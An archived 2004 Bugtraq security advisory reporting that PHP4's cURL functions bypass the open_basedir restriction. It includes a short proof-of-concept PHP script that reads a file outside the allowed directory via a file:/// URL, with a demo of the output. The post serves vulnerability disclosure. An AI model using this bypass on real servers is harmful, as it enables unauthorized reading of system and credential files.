PHP4 cURL functions bypass open_basedir

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP4 cURL functions bypass open_basedir
From: FraMe <frame@xxxxxxxxxxxx>
Date: Wed, 27 Oct 2004 18:26:23 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compile with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Tipe: Local
Risk: Low/Medium
=====================================================
 
PHP cURL functions bypass open_basedir
protection, so users can navigate through
filesystem.
 
For example, setting "open_basedir" in php.ini to
"/var/www/html" anybody can retrieve "/etc/parla"
using cURL functions.
 
== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
 
== Demo
$ cat /etc/parla
don't read please!
 
$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline
No release timeline.

-- 
FraMe <frame@xxxxxxxxxxxxxxx>
http://www.kernelpanik.org

Prev by Date: Re: zgv image viewing heap overflows
Next by Date: Re: Some Voters Say Machines Failed, Incorrect Choices Appear on Screens (fwd)
Previous by thread: [SECURITY] [DSA 575-1] New catdoc packages fix temporary file vulnerability
Next by thread: [USN-4-1] Standard C library script vulnerabilities
Index(es):
- Date
- Thread